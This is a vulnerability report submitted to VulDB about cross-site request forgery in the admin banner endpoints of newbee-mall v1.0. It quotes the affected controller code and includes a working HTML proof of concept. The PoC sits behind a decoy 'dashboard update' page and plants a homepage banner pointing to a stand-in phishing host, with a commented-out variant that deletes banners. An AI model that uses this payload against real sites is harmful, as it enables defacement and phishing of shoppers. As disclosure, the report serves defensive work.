| Title | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Description | # CSRF Vulnerability in Admin Carousel Management
## Summary
A **CSRF vulnerability** exists in the admin carousel (banner) management endpoints. Attackers can modify, delete, or add carousel images on the mall homepage, potentially displaying malicious content or phishing links to all site visitors.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(adminLoginInterceptor)
.addPathPatterns("/admin/**");
// ❌ No CSRF protection for admin operations
}
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/admin/NewBeeMallCarouselController.java`
The controller contains multiple vulnerable endpoints:
```java
// Add carousel
@PostMapping("/carousels/save")
@ResponseBody
public Result save(@RequestBody Carousel carousel) {
// ❌ No CSRF token validation
// ⚠️ Can add malicious banners with phishing links
}
// Update carousel
@PutMapping("/carousels/update")
@ResponseBody
public Result update(@RequestBody Carousel carousel) {
// ❌ No CSRF token validation
// ⚠️ Can modify existing banners
}
// Delete carousel
@DeleteMapping("/carousels/delete")
@ResponseBody
public Result delete(@RequestBody Integer[] ids) {
// ❌ No CSRF token validation
// ⚠️ Can remove all homepage banners
}
```
**Security Issues**:
1. ❌ No CSRF token validation on any carousel operations
2. ⚠️ Can inject malicious image URLs
3. ⚠️ Can add phishing links to redirect URL
4. ⚠️ Affects all site visitors
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Admin Dashboard Update</title>
</head>
<body>
<h2>???? Updating dashboard metrics...</h2>
<p>Please wait...</p>
<script>
// Add malicious carousel with phishing link
fetch('http://localhost:28089/admin/carousels/save', {
method: 'POST',
credentials: 'include',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
carouselUrl: 'https://evil-phishing-site.com/fake-login',
redirectUrl: 'https://evil-phishing-site.com/steal-credentials',
carouselRank: 1, // Display first
isDeleted: 0
})
})
.then(response => response.json())
.then(data => {
document.body.innerHTML = '<h3>✅ Dashboard updated!</h3>';
});
// Alternative: Delete all existing carousels
/*
fetch('http://localhost:28089/admin/carousels/delete', {
method: 'DELETE',
credentials: 'include',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify([1, 2, 3, 4, 5]) // Delete IDs 1-5
});
*/
</script>
</body>
</html>
```
## Impact
**Homepage defacement and mass phishing attack** - Attackers can display malicious banners to all site visitors, leading to widespread phishing attacks and brand reputation damage.
---
**CVSS Score**: 7.8 (High)
|
|---|
| Source | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/115 |
|---|
| User | flashzyc (UID 92850) |
|---|
| Submission | 02/05/2026 12:00 (4 months ago) |
|---|
| Moderation | 02/18/2026 07:56 (13 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery] |
|---|
| Points | 0 |
|---|